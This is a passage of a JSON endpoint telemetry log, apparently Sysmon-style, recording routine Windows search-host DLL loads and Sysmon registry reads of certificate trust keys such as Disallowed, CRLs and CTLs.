"{42FC7E13-CAE3-5C05-0000-001075934E01}" - }, - { - "event_type": "image_load", - "image_name": "gdi32.dll", - "image_path": "C:\\Windows\\System32\\gdi32.dll", - "pid": 6608, - "process_name": "SearchFilterHost.exe", - "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", - "timestamp": 131883570916369984, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" - }, - { - "event_type": "image_load", - "image_name": "gdi32full.dll", - "image_path": "C:\\Windows\\System32\\gdi32full.dll", - "pid": 6608, - "process_name": "SearchFilterHost.exe", - "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", - "timestamp": 131883570916369984, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" - }, - { - "event_type": "image_load", - "image_name": "kernel.appcore.dll", - "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", - "pid": 6608, - "process_name": "SearchFilterHost.exe", - "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", - "timestamp": 131883570916369984, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" - }, - { - "event_type": "image_load", - "image_name": "clbcatq.dll", - "image_path": "C:\\Windows\\System32\\clbcatq.dll", - "pid": 6608, - "process_name": "SearchFilterHost.exe", - "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", - "timestamp": 131883570916369984, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570916530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570916530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570916530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570916530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570916530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570916530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570916530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570916530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570916530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570916530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570916530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570916530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570916530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570916530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570916530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570916530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "tquery.dll", - "image_path": "C:\\Windows\\System32\\tquery.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570915900000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570916530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570916530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570916530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570916530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570916530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570916530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570916530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "cryptdll.dll", - "image_path": "C:\\Windows\\System32\\cryptdll.dll", - "pid": 6608, - "process_name": "SearchFilterHost.exe", - "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", - "timestamp": 131883570916369984, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" - }, - { - "event_type": "image_load", - "image_name": "cryptdll.dll", - "image_path": "C:\\Windows\\System32\\cryptdll.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570916060016, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "ntmarta.dll", - "image_path": "C:\\Windows\\System32\\ntmarta.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 